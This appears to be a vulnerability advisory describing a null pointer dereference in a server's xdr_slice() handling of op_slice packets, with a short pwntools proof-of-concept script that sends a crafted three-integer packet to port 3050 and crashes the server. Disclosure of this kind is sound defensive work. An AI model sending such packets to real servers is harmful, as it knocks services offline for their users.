Details

When processing an op_slice packet, the network protocol calls the xdr_slice() function with an unprepared slice_response->p_slr_sdl, which contains a null pointer. Inside xdr_slice() it is passed to SDL_info(), and then the null pointer is dereferenced, which causes the server to crash.

PoC

1. create a small network packet with 3 fields opcode(60), f1(0), f2(>0);
2. next, it is enough to simply send such packet to the server port using a python script:

from pwn import *

opcode = 60
f1 = 0
f2 = 1
pkt = struct.pack(">III", opcode, f1, f2)

p = remote('localhost', 3050)
p.send(pkt)
p.close()

Impact

Due to an emergency shutdown with a SIGSEGV error, server availability is disrupted.